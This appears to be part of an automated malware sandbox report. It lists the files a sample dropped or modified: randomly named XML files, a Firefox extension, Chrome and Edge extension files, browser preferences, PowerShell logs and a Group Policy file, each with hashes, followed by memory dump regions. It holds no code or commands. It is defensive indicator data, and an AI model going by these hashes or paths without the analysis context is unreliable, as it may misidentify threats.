C:\Program Files (x86)\EkAcBLsehYBU2\VNWMwgr.xmlFilesize
2KB
MD5b89e425cafd25ba98bb37645163855ef
SHA1e947fa5b505187e8bf7d7a03095b0d4ca276715b
SHA25692ca5131a2037ff89ea2005727e785abd72db3cf3574cfd3278994aaa2df299d
SHA512b9794a65f5e69086d2ae0adf073a7eadb6ab669cb059282e5c6098f8752b84852710f97be54cb4868025c57c2baafc705045bfa9766b599e1ae1bfa973524c37
-
C:\Program Files (x86)\LjPBjCkxU\HNgTMFj.xmlFilesize
2KB
MD53f2c722752dd808f9cdaeabb8bdbd82e
SHA1c87697c197fe57e0a32bfe0afd1072512ec5eb0b
SHA256c4ab93c98b87ccb7458253987c3510ef725da842b596d630266a95e014ad5073
SHA512c5fe92f59051c3844285653162bc90a4a18f0191b69f7c00381b727f932869e85f1f3a5f3081b5ff91b4258b911f15ba1a31f0f2f1b6b34f640c64c96c5e0283
-
C:\Program Files (x86)\WEPOREuymMJJC\DycnJMJ.xmlFilesize
2KB
MD579fa3f00b3d7226cb3119a6773fc824a
SHA1288416b20abb08f779da774e8628f6ba90e98747
SHA2568cd13eafa374d56667b16bd68bc18c1b48fa5e16aba1a80fb61ca3a7a0917c7e
SHA512e4f3e5853f779823ebb2410a03406c2a8548a19ebe559d8e98050cc4d81078c3b13917b36bbd7392eb042675f978926ac15225fd78c63385a00d57dcdcd8279f
-
C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\iBwvWTy.xmlFilesize
2KB
MD5bf1913223e3ac12b58d2e6fa246a823f
SHA1920c95b75576b23965398d212bf87e88630e1348
SHA256c9d828fd95166b22eafb23f4797226ef5d69caf1eb2cbc64bd4b7fe2c88cdded
SHA5120ae389eeb88a82f171d75c0669e96ef0a84cb7d5d20e87b7b379ecb1ff48314ab6fc2a2be7e389e5bbbbee14b57762d195861c23400c020eefec5327a6187d15
-
C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpiFilesize
641KB
MD5931f22ad8191be59ed9429bf0be8b265
SHA167948a1d11bd4dfeec04100d07e88c1c27c66ba4
SHA256a0935d621fccf7afd5dabb73aa648609d5c000314960aa80bb734f91bc63ccdd
SHA512f3b20d84a0c44b58897c91ae4ab3a7bc189a0f9b62beee57dc3514887b4e5a333559e4c8cc0564fafc17ce6d734c66d80e8767e8cb624b9e2a269a16a3899dde
-
C:\ProgramData\PtxASTBQXXYOENVB\gEpkQEa.xmlFilesize
2KB
MD50ce35ab902871229a7dffcaa2f5b39d3
SHA1f01ff796fc10394876fabcdce288ec6877ec7bc5
SHA256c5372359b35f9be8c0dad42bce9a08bbbb52e60a9cfa1c72064d446430b8881f
SHA512571d2357a10976b53b21c5b1ad4d539c2795d40fac52a23b79c42b2c8fa36d1e1ba04e2f20ffd6fdc41c6041e04d7ff60e20f29f9e706da2c465da8d82632c7a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\en\messages.jsonFilesize
150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\pt_BR\messages.jsonFilesize
161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
11KB
MD5094c7d3ac0207f50f4606ccbf13103d5
SHA1b9b8f4851bb4b48b0cd46514ded6a2ebf9fad286
SHA2563634e89e69402e9fd97b930ceb5dc6d6c8ba4eeca33d8edb859c5fcf9dc25718
SHA51200143440185b9565434c2a53bd4d3e25e3b779f97111acfad9aa4f02c385c77cfb87210826144f81f9271c577f0f73e6f11f93aa8aa9050409ee36d1c5a64d53
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hbiichfklkmlebacdfhkojcpmmakmamk\1.2.0_0\_locales\es\messages.jsonFilesize
186B
MD5a14d4b287e82b0c724252d7060b6d9e9
SHA1da9d3da2df385d48f607445803f5817f635cc52d
SHA2561e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA5121c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD52b0acab16e6705139e6f0596f721e455
SHA10c599f4dc1a2f9043f6367fd491e379ac1ac323b
SHA256cc75de545dc1aa5bffaa484f8248a0994599956f8184d9aadcceb8a94cfdb6f5
SHA5126ecb46f2c62081bd323d05f7f0bf1772e8a609fb063738b22918639a3b08a6a1b3262804a8130265e5df70641caf69f867f601d80264b2346c60ed4ddf09e367
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD50f7c3a6e9672844ee25871c06d2049f3
SHA1fd013ad769ad04693cb3b022b232ef66bc6a76ee
SHA256cfd95d11b164323e901b46599111f142a7bf68972651a663594119a378292135
SHA51238ac82d347ab795bfef06e1d805528d62a7dd7a25f38efb6f385819179a2fee1d8381e95b58afe0f47b6075aacc8284ea78d0ded7a2bf2a613e9576a9109637f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD594785e239a92ca5839cb0ee4567ccc45
SHA1060e1e758d42a81eaa6c7204a14c5006f01112f9
SHA256091a1393b56243c701981c685805c1960566eac53888ce463e2c6a80983b9595
SHA512741f0a62cfefee9aae492b47ca32a96e18988e445eba8626b951c5d98f7606f2728fba1a11869c10388e88bd888d3ed556629486790bcd3a11380f8ceba9b2d6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ef02vq21.nzj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\prefs.jsFilesize
7KB
MD572870c38b7b313ba9ae98f1dce12d548
SHA1e7f6640e60480fd2b0969b982c5b303484b2aedc
SHA256e0ebae7aa1b71be98d432d94ea2b051cd5a5061714cce2c3a3db29c558b6074e
SHA512d4e6f0172617a84f61f976a035d9d858555d304e01ad6f6b4617edef65df159681ba36093ac8ceee6903d4f58f6c9a978c78d2fb80e451638780f3811495ae6f
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
7KB
MD584e199e7f1748a3525c232934b8488e4
SHA1b0dac7a4b200586ef57f6eafbe31483a85124a25
SHA2563e33cf4e00fd9961693622aa3d0abfe9912e53bfb593e5e196f35c1a8f8455d8
SHA51212843fbc7b074d811838e6ed803323a9a1d54da6bb5c763b3753c9e0234fe01759a546d2fd91ba7b6b2ebe8d93cecae67193300ff02a3aefc53370c63906e89a
-
memory/1216-17-0x0000000007260000-0x00000000072F6000-memory.dmpFilesize
600KB
-
memory/1216-3-0x0000000005BB0000-0x0000000005C16000-memory.dmpFilesize
408KB
-
memory/1216-1-0x0000000005410000-0x0000000005A38000-memory.dmpFilesize
6.2MB
-
memory/1216-2-0x00000000052E0000-0x0000000005302000-memory.dmpFilesize
136KB
-
memory/1216-4-0x0000000005C90000-0x0000000005CF6000-memory.dmpFilesize
408KB
-
memory/1216-14-0x0000000005D00000-0x0000000006054000-memory.dmpFilesize
3.3MB
-
memory/1216-15-0x00000000062A0000-0x00000000062BE000-memory.dmpFilesize
120KB
-
memory/1216-16-0x00000000062E0000-0x000000000632C000-memory.dmpFilesize
304KB
-
memory/1216-20-0x00000000078B0000-0x0000000007E54000-memory.dmpFilesize
5.6MB
-
memory/1216-19-0x00000000067E0000-0x0000000006802000-memory.dmpFilesize
136KB
-
memory/1216-18-0x0000000006790000-0x00000000067AA000-memory.dmpFilesize
104KB
-
memory/1216-0-0x0000000002980000-0x00000000029B6000-memory.dmpFilesize
216KB
-
memory/1996-27-0x0000000005EF0000-0x0000000006244000-memory.dmpFilesize
3.3MB
-
memory/1996-38-0x0000000006A40000-0x0000000006A8C000-memory.dmpFilesize
304KB
-
memory/2792-49-0x0000000006180000-0x00000000064D4000-memory.dmpFilesize
3.3MB
-
memory/3716-54-0x0000024B2A160000-0x0000024B2A182000-memory.dmpFilesize
136KB
-
memory/3820-119-0x0000000004840000-0x00000000048A3000-memory.dmpFilesize
396KB
-
memory/3820-23-0x0000000010000000-0x00000000105DB000-memory.dmpFilesize
5.9MB
-
memory/3820-75-0x00000000040F0000-0x0000000004175000-memory.dmpFilesize
532KB
-
memory/3820-446-0x0000000005410000-0x000000000549A000-memory.dmpFilesize
552KB
-
memory/3820-460-0x0000000005670000-0x0000000005753000-memory.dmpFilesize
908KB